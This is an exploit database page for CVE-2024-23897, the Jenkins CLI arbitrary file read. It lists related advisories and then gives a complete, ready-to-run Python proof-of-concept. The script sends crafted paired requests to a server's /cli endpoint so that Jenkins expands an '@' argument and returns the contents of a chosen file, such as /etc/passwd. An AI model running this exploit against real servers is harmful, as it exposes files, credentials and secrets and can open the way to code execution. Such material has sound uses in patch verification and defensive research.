Jenkins 2.441 / LTS 2.426.3 Arbitrary File Read vulnerability in Python exploit
Title | Published | Views | Family
---|---|---|---
BIT-JENKINS-2024-23897 | 6 Mar 2024 10:53 | – | osv
CVE-2024-23897 | 24 Jan 2024 18:15 | – | osv
CGA-7599-VH7R-JGGH | 6 Jun 2024 12:24 | – | osv
CGA-HH8Q-GM3C-2W42 | 6 Jun 2024 12:26 | – | osv
GHSA-6F9G-CXWR-Q5JR Arbitrary file read vulnerability through the Jenkins CLI can lead to RCE | 24 Jan 2024 18:31 | – | osv
RHSA-2024:0776 Red Hat Security Advisory: jenkins and jenkins-2-plugins security update | 30 Sep 2024 07:10 | – | osv
RHSA-2024:0775 Red Hat Security Advisory: jenkins and jenkins-2-plugins security update | 30 Sep 2024 16:32 | – | osv
RHSA-2024:0778 Red Hat Security Advisory: Jenkins and Jenkins-2-plugins security update | 30 Sep 2024 15:05 | – | osv
Exploit for Path Traversal in Jenkins | 8 May 2024 02:28 | – | githubexploit
Exploit for Path Traversal in Jenkins | 27 Jan 2024 12:57 | – | githubexploit
```python
# python poc.py
# [*] usage: python poc.py http://127.0.0.1:8888/ [/etc/passwd]
import threading
import http.client
import time
import uuid
import urllib.parse
import sys

if len(sys.argv) != 3:
    print('[*] usage: python poc.py http://127.0.0.1:8888/ [/etc/passwd]')
    sys.exit(1)

# Framed CLI request body: the "help" command followed by the second
# command-line argument as its parameter, then the charset and locale frames.
data_bytes = (
    b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@'
    + sys.argv[2].encode()
    + b'\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05zh_CN\x00\x00\x00\x00\x03'
)
target = urllib.parse.urlparse(sys.argv[1])
# Both HTTP requests share one Session id so Jenkins pairs them as a single CLI session.
uuid_str = str(uuid.uuid4())
print(f'REQ: {data_bytes}\n')


def req1():
    # "download" side: this request stays open and receives the CLI output.
    conn = http.client.HTTPConnection(target.netloc)
    conn.request("POST", "/cli?remoting=false", headers={
        "Session": uuid_str,
        "Side": "download"
    })
    print(f'RESPONSE: {conn.getresponse().read()}')


def req2():
    # "upload" side: this request carries the framed command bytes.
    conn = http.client.HTTPConnection(target.netloc)
    conn.request("POST", "/cli?remoting=false", headers={
        "Session": uuid_str,
        "Side": "upload",
        "Content-type": "application/octet-stream"
    }, body=data_bytes)


# Open the download side first, then send the upload side shortly after.
t1 = threading.Thread(target=req1)
t2 = threading.Thread(target=req2)
t1.start()
time.sleep(0.1)
t2.start()
t1.join()
t2.join()
```